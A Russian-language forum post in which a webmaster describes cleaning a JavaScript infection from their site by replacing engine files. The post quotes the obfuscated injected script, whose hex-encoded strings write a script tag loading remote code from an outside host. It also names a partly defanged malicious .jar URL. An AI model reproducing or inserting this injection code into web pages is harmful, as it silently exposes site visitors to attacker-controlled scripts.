Тема #3473

Уже неделю как мой сайт атаковал вирус:))) Зараза гадкая и я не сразу понял что она у меня сидит, но в последние дни(вчера) он начала доставать меня своей активностью.
Естественно я начал с ним бороться. Сначало почистил корень ftp, половина вируса была уничнтожена. Т.к. 1 из симптомов исчез, но он все равно остался где-то в закромах движка:)
Решение пришло-Нужно было заменить файлы движка.
После замены тварь пропала. Поскольку я постоянно проверял, обнаружил что вирус жил в java скриптах
"var _0x158e=["14989","icq","0","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x75\x6E\x6F\x2E\x66\x6C\x69\x70\x66\x6C\x61\x70\x66\x6C\x6F\x2E\x6E\x65\x74\x2F\x3F\x74\x3D","\x26\x70\x69\x64\x3D","\x26\x6E\x6F\x61\x64\x75\x6C\x74\x3D","\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];var pid=_0x158e[0];var t=_0x158e[1];var noadult=_0x158e[2];document[_0x158e[7]](_0x158e[3]+t+_0x158e[4]+pid+_0x158e[5]+noadult+_0x158e[6]);"
Думаю что он имел подобный код.)
В общем победа за человеком:)) вирус назывался так, точнее откуда он атаковал: http://jakd.cz.cc/games/javaobe.ja*r Звездочку специально поставил, потому что даже если в поиске вводишь антивирус орет:))
Если кого-то приследует эта зараза прсото заменяйте ява скрипты! Т.е. Если двиг то на стандартные.
Вирус заметил у 3х моих знокомых вебмастеров. Один из них снес сайт:) И начал с начала:)) При 10 Тиц поступок героический, статей было не мало:))

А лично я потерял с 100-200 посещаимости с поиска из за этой гадины:)) Но теперь мой сайтик в норме) РуссТалантс.ру опять живет:))